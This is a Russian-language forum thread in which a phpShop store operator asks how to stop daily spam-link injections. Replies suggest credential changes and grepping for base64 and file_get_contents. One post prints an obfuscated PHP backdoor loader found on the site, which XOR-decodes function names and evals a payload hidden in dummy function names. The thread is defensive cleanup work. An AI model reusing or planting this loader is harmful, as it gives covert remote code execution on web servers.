История такая, есть магазин phpShop и каждый день в описания или в титул лезут ссылки с порно ресурсами и так далее.... как можно избавится от этой проблемы? как их быстро выявлять? расскажите кто сталкивался с таким?
Нужно проверять код на бэкдоры, скорее всего (вероятность 90%) что тебя взломали. Или ты сразу установил скрипт с чужими правками.
мне просто этот магазин передали, по работе, да и доступ на фтп много кто знает. Мои действия поменять пароль на фтп и проверить на бэкдоры? И да как это сделать можно? проверить? Как эти проги называются?
да, поменять логин, пароль. просканить например, этим: http://wmasteru.org/threads/2880/ если ничего не даст, поискать на наличие base64_*, file_get_content, file_put_content и т.д.
тобишь я заливай весь сайт на локалк, и допустим через тотал командер ищу во всех файлах запросы base64 потом ile_get_content, и так далее? И наверно еще можно файл базы SQL посканить по запросам например "porno" ?
и так проверил через поиск файлы на base64 потом ile_get_content, таких страниц около 300 нашлось....проверил sql базу на ссылки левые....там их более 1к...... как действовать в таких ситуациях?
Смотреть что они делают Может движок так работает. base64 раскодировать. Руками - это будет адово Запросом или процедурой вычищать.
PHP: function yf13015c323a4235b0889254(){}function yf13015c8b7a8eef77f0f8db(){}..тут function таких одинаковых идет штук 100..function yf13015cc1424590ad55f2ea(){}function yf13015cfcbf(){}$uf16cd=w13dda(array(117,113,108,112,115,120,121));$g121b3fa=w13dda(array(125,110,110,125,101,67,122,117,112,104,121,110));$mf7737=w13dda(array(111,105,126,111,104,110));$ubeb9c=w13dda(array(121,106,125,112));$a9e1f8=w13dda(array(123,102,117,114,122,112,125,104,121));$ic8a9b=w13dda(array(108,125,127,119));$a4febd=w13dda(array(123,121,104,67,120,121,122,117,114,121,120,67,122,105,114,127,104,117,115,114,111));$c70bda=$a4febd();$qd89=null;$c70bda=$g121b3fa($c70bda[w13dda(array(105,111,121,110))], w13dda(array(123,46,127,36,41,121)));$wef9 = array(); foreach($c70bda as $f){$wef9[] = $mf7737($f,8);};eval($a9e1f8($ic8a9b(w13dda(array(84,54)),$uf16cd($qd89,$wef9))));function w13dda($o2ae){global $qd89; $ret = $qd89;for($i=0; $i < count($o2ae); $i++)$ret.=chr($o2ae[$i]) ^ chr(28);return $ret;}function g2c85e($o2ae){global $mf7737; return ($mf7737($o2ae,0,8)== w13dda(array(101,122,45,47,44,45,41,127)));} вам не кажется, что больно подозрительный код?
Чаще всего дублируется один код. Ты скинул нам просто массив, и по нему судить сложно. Распиши: 1. Что за версия? 2. Какие изменения проводились? 3. Несколько отрывков base64 и ile_get_content. 4. Где именно в базе ссылки. Возможно достаточно одного или нескольких sql-запросов для чистки базы.
1 PHPShop 2.1.95.1.0 Enterprise 2 Да много чего с ним делали это точно, но что именно я не в курсах. 3 там этих файлов с этими кодами больше 200 4 Ссылки спамятся в категории в их описание, в новости, в статьи, в заголовки новостей (скрытые),
